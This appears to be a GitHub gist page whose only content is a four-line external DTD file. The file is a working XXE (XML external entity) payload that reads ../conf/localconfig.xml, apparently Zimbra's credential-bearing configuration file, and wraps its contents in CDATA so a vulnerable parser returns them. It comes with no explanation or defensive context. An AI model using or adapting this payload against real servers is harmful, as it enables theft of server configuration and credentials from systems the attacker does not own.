Skip to content

Instantly share code, notes, and snippets.

@deFming
Created May 10, 2019 10:49
Show Gist options
  • Save deFming/64ef8fe8473d3750a0763997e2b1ce5c to your computer and use it in GitHub Desktop.
Save deFming/64ef8fe8473d3750a0763997e2b1ce5c to your computer and use it in GitHub Desktop.

Revisions

  1. deFming created this gist May 10, 2019.
    4 changes: 4 additions & 0 deletions dtd
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,4 @@
    <!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
    <!ENTITY % start "<![CDATA[">
    <!ENTITY % end "]]>">
    <!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">